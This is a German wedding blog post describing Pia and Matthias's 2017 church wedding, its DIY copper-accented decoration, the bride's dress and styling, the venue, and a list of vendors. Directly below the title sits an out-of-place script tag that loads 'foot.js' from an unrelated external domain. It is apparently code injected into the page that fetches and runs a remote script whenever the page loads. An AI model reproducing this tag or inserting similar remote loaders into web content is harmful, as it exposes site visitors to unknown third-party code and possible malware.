Hochzeit von Pia & Matthias
<script src='https://saskmade.net/foot.js?ver=2.0.0' type='text/javascript'></script>

Am 26. Juli 2017 gaben sich Pia & Matthias bei einer kirchlichen Trauung in der Katholischen Pfarrkirche Maria Magdalena, das Ja-Wort. Umgeben von all ihren Freunden und der ganzen Familie, die alle an diesem besonderen Tag mitwirkten, feierten sie eine wunderschöne Sommerhochzeit. So ist die grandiose Dekoration, natürlich & leicht mit Kupferelementen, eine wirklich tolle DIY-Hochzeitsinspiration! Oder um es mit den Worten der Braut zu sagen: „Es war einfach wunderschön. Wenn ich zurück denke, bin ich unseren beiden Familien und Trauzeuginnen unendlich dankbar. Sie haben uns so sehr unterstützt und alles umgesetzt, was wir uns in den Kopf gesetzt haben. Die ganze Dekoration war selbst gemacht und hätte ohne ihre Hilfe nicht geklappt."

Das bezaubernde Brautkleid ist ein Kleid von Justin Alexander aus der Linie Sweetheart. Das hübsche Hair & Makeup der Braut zauberte Laura Böhnlein von DieTolle, welches perfekt ergänzt wird durch die Flowercrown und den Brautstrauß von Pusteblume. Der Bräutigam trägt einen Anzug von Bernd Puderbach mit den perfekten Accessoires von Der feine Herr.

In der Hochzeitlocation, dem Bürgerhaus Mörsbach, sorgte die Metzgerei Schmidt für das Wohl des Brautpaares und ihrer Gäste. Und zu guter Letzt, das Hochzeitsauto, welches auch eine tolle Fotolocation für das Brautshooting ist, hat das Brautpaar bei der Oldtimervermietung Westerwald gemietet. Jetzt wünsche ich euch ganz viel Freude bei dieser wunderschönen Sommerhochzeit!

 

Dienstleister

Brautmode
Justin Alexander

Herrenmode
Der feine Herr
Bernd Puderbach

Hair & Make up
DieTolle

Blumen
Pusteblume

Oldtimer
Oldtimervermietung Westerwald

Location
Bürgerhaus Mörsbach

Fotografie
Julia Walter

 

Hinterlassen Sie einen Kommentar